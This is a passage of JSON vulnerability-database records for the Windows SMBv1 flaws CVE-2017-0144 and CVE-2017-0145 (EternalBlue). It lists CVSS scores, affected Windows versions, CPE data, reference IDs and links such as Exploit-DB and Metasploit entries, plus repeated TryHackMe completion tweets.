"OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-04-23T00:07:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}], "modified": "2021-04-23T00:07:42"}, "score": {"value": 9.1, "vector": "NONE", "modified": "2021-04-23T00:07:42", "rev": 2}, "twitter": {"counter": 88, "tweets": [{"link": "https://twitter.com/RonnyArias/status/1422356892483981314", "text": "Blue - I have just completed this room! Check it out: https://t.co/TJq1bBTWoK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/QuentinCasares/status/1422521751523762177", "text": "Blue - I have just completed this room! Check it out: https://t.co/0l0HtT6bML?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/shadow44406573/status/1423260611429998593", "text": "Blue - I have just completed this room! Check it out: https://t.co/sijYaXhkoQ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/top_wizard/status/1423289010630270995", "text": "Blue - I have just completed this room! Check it out: https://t.co/1ICOkz0X0h?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/InfoSec_MBE/status/1425558031790657546", "text": "Blue - I have just completed this room! Check it out: https://t.co/Tms9b4JF84?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/uk_NJx/status/1426573521308762112", "text": "Blue - I have just completed this room! Check it out: https://t.co/B1WGZBexHA?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/carlos_o_m/status/1426612611009892352", "text": "Blue - I have just completed this room! Check it out: https://t.co/6jaCHwnUja?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click a trav\u00e9s de /RealTryHackMe"}, {"link": "https://twitter.com/AynRandSucks/status/1429439489068306434", "text": "Blue - I have just completed this room! Check it out: https://t.co/Ypt3f3Ra8A?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/cts_technology/status/1429414666082607108", "text": "Finally!\nBlue - I have just completed this room! Check it out: https://t.co/hJYxVXD4we?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0x6d61/status/1430147082573074436", "text": "Blue - I have just completed this room! Check it out: https://t.co/08xRz1yFx7?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}], "modified": "2021-04-23T00:07:42"}}, "objectVersion": "1.5", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145", "refsource": "CONFIRM", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0145"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "96705", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96705"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "immutableFields": []}, {"id": "CVE-2017-0144", "bulletinFamily": "NVD", "title": "CVE-2017-0144", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "published": "2017-03-17T00:59:00", "modified": "2018-06-21T01:29:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0144", "reporter": "secure@microsoft.com", "references": ["https://www.exploit-db.com/exploits/42031/", "https://www.exploit-db.com/exploits/42030/", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0144"], "type": "cve", "lastseen": "2021-04-23T00:07:42", "history": [{"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:16:45", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"], "type": "threatpost"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["SMNTC-96704"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-05-29T18:16:45", "value": 8.4, "vector": "NONE"}}, "hash": "160d463cdf6108e0c3b4f4b3e0cb3bdb62baa98398b542253a8147bd30bc4d34", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "3d33672b05b572e15dc2cac26ad54d7c", "key": "title"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "515eb09d946f69b39e3e0878e761b6fb", "key": "references"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6fd95f86c673c4a8b4f1fd51b22d928f", "key": "href"}, {"hash": "e9f80c9b0a5d969452d09ddbf4c74a71", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "013b6203cead14382a8f19ad32d99966", "key": "cvelist"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0144", "id": "CVE-2017-0144", "lastseen": "2019-05-29T18:16:45", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://www.exploit-db.com/exploits/42031/", "https://www.exploit-db.com/exploits/42030/", "http://www.securityfocus.com/bid/96704", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0144", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0144", "type": "cve", "viewCount": 56}, "differentElements": ["references"], "edition": 1, "lastseen": "2019-05-29T18:16:45"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0144"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:30", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", 